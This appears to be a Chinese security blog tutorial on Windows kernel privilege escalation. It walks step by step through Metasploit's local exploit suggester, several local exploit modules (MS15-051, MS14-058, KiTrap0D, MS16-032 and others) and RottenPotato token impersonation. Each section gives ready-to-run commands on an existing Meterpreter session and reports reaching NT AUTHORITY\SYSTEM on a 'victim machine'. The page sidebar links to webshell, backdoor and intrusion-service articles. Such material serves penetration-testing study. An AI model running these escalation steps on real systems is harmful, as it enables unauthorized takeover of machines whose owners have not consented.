继上一篇“使用自动化脚本进行Windows提权”,本文将介绍有关Windows内核漏洞提权的方法。我将使用内置的Metasploit模块作为演示。通过本文的学习,你将了解系统的哪些部分可被利用,并匹配最佳可利用模块进一步的提升权限。
Windows-Exploit-suggester
Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。虽说如此,但也并非所有列出的local exploits都可用。所以,无论是漏洞利用还是查找最好的办法就是自动结合手动。
用法
注:要使用local exploit suggester,我们必须已在目标机器上获取到了一个Meterpreter session。在运行Local Exploit suggester之前,我们需要将现有的Meterpreter session调到后台运行(CTRL + Z)
示例,假设我们现在有一个Meterpreter session 1
use post/multi/recon/local_exploit_suggester set LHOST 192.168.1.107 set SESSION 1 exploit
如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用模块。
Windows ClientCopyImage Win32k Exploit
Windows内核模式驱动程序特权提升漏洞。此模块利用了win32k.sys内核模式驱动程序中的不正确对象处理进行提权。
该模块已在Windows 7 x64和x86,Windows 2008 R2 SP1 x64的易受攻击版本上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms15_051_client_copy_image set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功执行,就会打开另一个Meterpreter session
getsystem getuid
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
Windows TrackPopupMenu Win32k NULL指针解引用
此模块利用了win32k.sys中的NULL指针解引用,漏洞可通过TrackPopupMenu函数进行触发。在特殊情况下,我们可以滥用在xxxSendMessageTimeout上的NULL指针解引用,来实现任意代码执行操作。
该模块已在Windows XP SP3,Windows Server 2003 SP2,Windows 7 SP1 Windows Server 2008 32位和Windows Server 2008 R2 SP1 64位上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms14_058_track_popup_menu set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功执行,就会打开另一个Meterpreter session
getsystem getuid
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
通过KiTrap0D提升Windows权限
此模块将通过KiTrap0D exploit创建具有SYSTEM权限的新会话,如果当前使用的会话权限已提升,则exploit将不会运行。该模块依赖于kitrap0d.x86.dll,因此在x64版本的Windows上不受支持。
该模块已在32位的Windows Server 2003,Windows Server 2008,Windows 7和XP易受攻击版本上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms10_015_kitrap0d set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功执行,就会打开另一个Meterpreter session
getsystem getuid
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
Task Scheduler XML提权
此漏洞发生在Task Scheduler中,可允许用户提升权限。如果攻击者登录到受影响的系统,并运行特制应用程序,则该漏洞可能允许特权提升。攻击者必须拥有有效的登录凭据,并且能够在本地登录才能成功利用此漏洞。远程或匿名用户则无法利用此漏洞。
该模块已在Windows Vista,Windows 7,Windows Server 2008 x64和x86的易受攻击版本上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms10_092_schelevator set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功执行,就会打开另一个Meterpreter session
getsystem getuid
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
MS16-016 mrxdav.sys WebDav本地提权
此模块利用了mrxdav.sys中的漏洞。其将在目标系统生成一个进程,并在执行payload之前将其权限提升到NT AUTHORITY\SYSTEM。
该模块已在Windows 7 SP1,x86架构的易受攻击版本上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms16_016_webdav set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功执行,就会打开另一个Meterpreter session
getsystem getuid
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
EPATHOBJ::pprFlattenRec本地提权
此模块利用了EPATHOBJ :: pprFlattenRec上的漏洞,其主要问题出在使用了未初始化的数据(即允许损坏内存)。
目前,该模块已在Windows XP SP3,Windows 2003 SP1和Windows 7 SP1上成功进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ppr_flatten_rec set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功执行,就会打开另一个Meterpreter session
getsystem getuid
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
MS13-053 : NTUserMessageCall Win32k内核池溢出
Win32k中的内核池溢出漏洞,可允许本地用户提权。内核shellcode使winlogon.exe进程的ACL为NULL(SYSTEM进程)。这将允许任何非特权进程自由迁移到winlogon.exe,从而提升用户权限。注意:退出meterpreter会话时,可能会导致winlogon.exe崩溃。
目前,该模块已在Windows 7 SP1 x86上成功测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms13_053_ schlamperei set lhost 192.168.1.107 set session 1 exploit
一旦exploit成功执行,就会打开另一个Meterpreter session
getsystem getuid
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
MS16-032 Secondary Logon Handle提权
此模块利用了Windows Secondary Logon Service中缺少标准句柄过滤的问题。该漏洞主要影响Windows 7-10和2k8-2k12 32/64位版本。此模块仅适用于具有Powershell 2.0或更高版本的Windows系统,以及具有至少两个或以上CPU内核的系统。
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc set session 1 exploit
一旦exploit成功执行,就会打开另一个Meterpreter session
getsystem getuid
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
RottenPotato
使用RottenPotato将服务帐户本地提权至SYSTEM。
首先,我们在meterpreter会话中使用以下选项查看当前系统上是否存在任何有效tokens。
load incognito
list_token -u
可以看到,当前并没有任何token可用。
现在,我们从github下载Rottenpotato。
git clone https://github.com/foxglovesec/RottenPotato.git cd RottenPotato
下载完成后我们会在Rottenpotato目录下,看到一个rottenpotato.exe文件。
将该文件上传至受害者机器。
upload /root/Desktop/RottenPotato/rottenpotato.exe .
然后,键入以下命令执行该exe文件,并将SYSTEM token添加到impersonate user tokens下。
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM
猜你还喜欢
- 08-04最全的webshell提权资料
- 09-16Linux后门整理合集
- 09-24Windows内网渗透提权的几个实用命令
- 09-10实战Linux下三种不同方式的提权技巧
- 08-03内网渗透:利用WMI代替psexec(WMIEXEC.vbs)
- 02-13ADB配置提权漏洞(CVE-2017-13212)原理与利用分析
- 11-16星外虚拟主机跨web目录文件读取技巧
- 06-05基于bro的计算机入侵取证实战分析
- 09-21渗透技巧——Windows单条日志的删除
- 08-03详解Filezilla提权
- 随机文章
-
- 恶意程序报告在线查询工具
- 几条让你的Linux”自爆”的命令
- CentOS DNS服务配置
- asp截获后台登录密码
- CVE-2013-2471漏洞分析
- 从对一个安全产品的测试看产品架构安全
- 逆向笔记【壹】
- 热门游戏《英雄联盟》和《流放之路》官方版本中被植入木马后门
- 逆向思维之浅谈渗透过程中的角色转换
- 15个实用的Linux find命令示例
- 有趣的php反序列化总结
- PrettyPhoto(jQuery插件)的DOM型XSS分析
- 代码审计学习之三个白帽Xor挑战
- 无需登录-悟空CRM 存储型XSS
- php代码审计基础笔记
- php框架slim架构上存在XXE漏洞(XXE的典型存在形式)
- Java RMI服务远程命令执行利用
- PHP代码审计tips
- Python中eval带来的潜在风险
- PHP自动化白盒审计技术与实现
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-